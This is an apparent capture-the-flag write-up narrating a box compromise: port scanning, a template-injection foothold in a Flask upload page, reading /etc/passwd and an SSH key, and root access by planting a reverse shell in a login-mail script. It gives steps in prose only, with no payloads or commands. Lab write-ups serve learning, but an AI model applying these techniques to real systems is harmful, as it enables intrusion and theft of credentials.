SCANNING
Initial recon stage:
Through nmap scanning we found port 22 and 80 were open.
Connection to the port 80 in the browser, we found the default webpage. From the default webpage we found a link to another page, which runs on flask framework.
FOOTHOLD
After some research we found that this particular framework is vulnerable to SSTI attacks.
We created a sample athematic operation on a image and uploaded the file, as a result we get the correct answer. So we concluded that the framework can be exploited with SSTI attacks.
With some deep research works we created some payloads and uploaded the file. We were able to read /etc/passwd, which helped us to get the user name. With that we read the ssh key to get the reverse shell connection.
PRIVILLAGE ESCALATION
In order to get the root access we run linpeas.sh to get the known vulnerabilities, but we hadn’t find any but we found a suspicious file location.We just moved to the location and read the files. The script says that every time a new successful login was detected the server send a mail to the root.
We changed some variables in the script and created a new one with recipient name as our user name and placed it in the same directory. So the next time when we login the server could send mail to our user too. It was just a try and we succeed in out attempt.
So now we place our newly created script inside the original one along with a bash reverse shell command and opened our netcat listener. Successfully we get the connection as the root user.
PWNED.!!!
Comments